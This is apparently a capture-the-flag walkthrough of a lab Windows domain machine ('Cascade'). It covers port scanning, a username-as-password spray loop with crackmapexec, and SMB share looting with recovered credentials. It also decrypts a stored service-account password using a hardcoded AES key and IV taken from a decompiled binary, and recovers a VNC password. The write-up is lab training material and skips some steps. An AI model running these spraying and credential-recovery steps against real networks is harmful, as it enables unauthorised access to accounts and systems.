Hey, good to be back writing again. I rooted this machine today and really like it.
So i want to share with you how you can root it.
First, i started scanning the open ports on the machine.
rustscan -a 10.10.10.182 --ulimit 5000
I used rustcan and it just gaved me DNS,Kerberos,SMB and ldap, While there were other ports available. Unfortunately that was because --ulimit flag, For this box it wasn't a big deal but just wanted to inform you that to double check your tools and if you can have couple of tools that can do the same purpose that will be great.
From nmap script scan i got the domain name which was cascade.local, so let's update out hosts file.
sudo sh -c 'echo "10.10.10.182 cascade.local" >> /etc/hosts'
SMB
I kinda like to start enumerating smb shares and dig into it. So i tried to make a null authentication but it didn't work out.
At the time when i was solving this i had a pervious machine that a user had his username as his password so i tried to spray it.
Before you spray look for the lockout threshold, for this machine there is no any lockouts threshold.
Will try password spray (username in this contex)
As everytime there are many tools that can help you brute force and for no reason i want to use crackmapexec. But there is a problem, we can't spray username as password for each user it will continue using other usernames as password
for user in $(cat users); do crackmapexec smb 10.10.10.182 -u "$user" -p "$user"; done
Tried also a dictionary attack but yeah it didn't work either. (SecLists)
Okay this wasn't the way for initial foothold in this machine but good to test everything.
Since we still don't have any credntials we can try AS-REP Roasting but still a dead end.
cat usersfull | grep -i description -n -B 5
12-objectClass: top
13-objectClass: person
14-objectClass: organizationalPerson
15-objectClass: user
16-cn: CascGuest
17:description: Built-in account for guest access to the computer/domain
we only get a description for CascGuest and the rest of the users description field is null.
so maybe there is a unique field.
okay i used ai for this but man that's makes our life a lot easier
Data share is interesting let's dig into it, we got 4 files
* Meeting_Notes_June_2018.html
* ArkAdRecycleBin.log
* dcdiag.log
* VNC Install.reg
smbclient //10.10.10.182/Data -U r.thompson 'rY4n5eva'
prompt off
recurse on
mget *
firefox Meeting_Notes_June_2018.html&
Well they gave a hint for a user (TempAdmin) and that't wasn't in our users list
ArkAdRecycleBin.log
We can see that ArkSvc can delete objects and he deleted Test and TempAdmin
dcdiag.log
* The KDC cannot find a suitable certificate for smart card logons.
* The DFS Namespace service couldn’t initialize cross-forest trust information.
* _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local could not be resolved.
* The PDC Emulator has no external time source.
file CascAudit.exe
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
sqlite3 Audit.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap ;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc ;
sqlite> # nothing from misc #
Lets's dig into CascAudit.exe, In the MainModule appears to be extracting credentials from an SQLite database and decrypting a stored password using a hardcoded key (c4scadek3y654321).
public static void Main()
{
if (MyProject.Application.CommandLineArgs.Count != 1)
{
Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
return;
}
checked
{
using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
{
string str = string.Empty;
string password = string.Empty;
string str2 = string.Empty;
try
{
sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
{
sqliteDataReader.Read();
str = Conversions.ToString(sqliteDataReader["Uname"]);
str2 = Conversions.ToString(sqliteDataReader["Domain"]);
string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting password: " + ex.Message);
return;
}
}
}
sqliteConnection.Close();
}
Now let's run the program and break on sqliteConnection.Close(); .
the encryptedString is the same as the hash from ldap we saw in ldap table in audit.db
so now we a clear password for ArkSvc.
if for some reason we couldn't debug we can dig into Crypto function and we can read it in CascCrypto.dll
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace CascCrypto
{
// Token: 0x02000007 RID: 7
public class Crypto
{
// Token: 0x06000012 RID: 18 RVA: 0x00002290 File Offset: 0x00000690
public static string EncryptString(string Plaintext, string Key)
{
byte[] bytes = Encoding.UTF8.GetBytes(Plaintext);
Aes aes = Aes.Create();
aes.BlockSize = 128;
aes.KeySize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Key = Encoding.UTF8.GetBytes(Key);
aes.Mode = 1;
string result;
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(), 1))
{
cryptoStream.Write(bytes, 0, bytes.Length);
cryptoStream.FlushFinalBlock();
}
result = Convert.ToBase64String(memoryStream.ToArray());
}
return result;
}
By using ai, it will create a python script that can help us to decrypt the hash we have
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
# Values from C# encryption
encrypted_text_b64 = "BQO5l5Kj9MdErXx6Q6AGOw==" # Replace with actual Base64 output from C#
key = b"c4scadek3y654321" # Must be exactly 16 bytes
iv = b"1tdyjCbY1Ix49842" # IV must be 16 bytes
# Decode Base64 to get encrypted bytes
encrypted_text = base64.b64decode(encrypted_text_b64)
# Initialize AES cipher in CBC mode
cipher = AES.new(key, AES.MODE_CBC, iv)
# Decrypt and remove padding
try:
decrypted_bytes = cipher.decrypt(encrypted_text)
decrypted_password = unpad(decrypted_bytes, AES.block_size).decode('utf-8')
print("Decrypted Password:", decrypted_password)
except ValueError as e:
print("Decryption failed:", e)
From ldap we dump users,groups,computres and objects.
There are many tools to help you dump information from ldap.
I like to make a list of users maybe would help in brute forcing.
Snice we use -o , windapsearch created .tsv file and we only want to get usernames from it
VNC Install.reg
At the first momment i thought hex from password represents colors or something but that wasn't the right path. After searching about vnc we got github repo that tech us how to decrypt the password
and we got a potential password for s.smith.
